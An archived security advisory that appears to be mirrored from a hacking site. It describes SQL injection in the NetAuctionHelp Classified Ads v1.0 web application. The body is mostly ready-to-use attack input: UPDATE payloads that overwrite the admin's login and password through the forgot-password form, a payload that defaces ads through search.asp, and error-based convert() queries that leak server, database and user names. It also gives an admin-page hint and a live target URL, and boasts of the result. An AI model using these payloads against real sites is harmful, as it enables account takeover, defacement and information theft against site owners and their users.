AOH :: HP Unsorted N :: TB13564.HTM

NetAuctionHelp Classified Ads v1.0 SQL Injection



NetAuctionHelp Classified Ads v1.0 SQL Injection
NetAuctionHelp Classified Ads v1.0 SQL Injection



Aria-Security Team=0D
http://Aria-Security.Net=0D 
------------------------------------------=0D
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1111=0D 
Try it online @ http://ads.netauctionhelp.com=0D 
=0D
=0D
needed tables:=0D
=0D
tblMember.id=0D
tblMember.login=0D
tblMember.pswd=0D
=0D
Vulnarable Page: Login.asp=0D
Run this query for Forget Password=0D
-1' UPDATE tblMember Set login= 'admin' where(id='1');--=0D
-1' UPDATE tblMember set pswd= 'hacked' Where(id= '1');--=0D
=0D
=0D
there it is, admin with the password hacked=0D
=0D
------------------------------------------------------------------------------------=0D
these may help the attacker to get more info in the search.asp page=0D
=0D
/search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=[SQL Injection]=0D
=0D
=0D
tblAd.id,tblAd.imagepath,tblAd.aspectratio,tblAd.t itle,tblAd.zip,tblAd.state,tblAd.startdate'=0D
=0D
=0D
example: -1' update tblAd set title= 'hacked' where(id='1');--=0D
site.com/addetl.asp?id=1 will say HACKED.=0D
=0D
1' or 1=convert(int,@@version)--=0D
1' or 1=convert(int,@@servername)--=0D
1' or 1=convert(int,db_name())--=0D
1' or 1=convert(int,user_name())--=0D
1' or 1=convert(int,system_user)--=0D
=0D
=0D
hint: /auctionAdmin/admLogin.asp ;)=0D
=0D
=0D
Greetz: AurA=0D
Credits goes to Aria-Security Team=0D
Regards,=0D
The-0utl4w=0D
=0D
=0D
=0D
=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.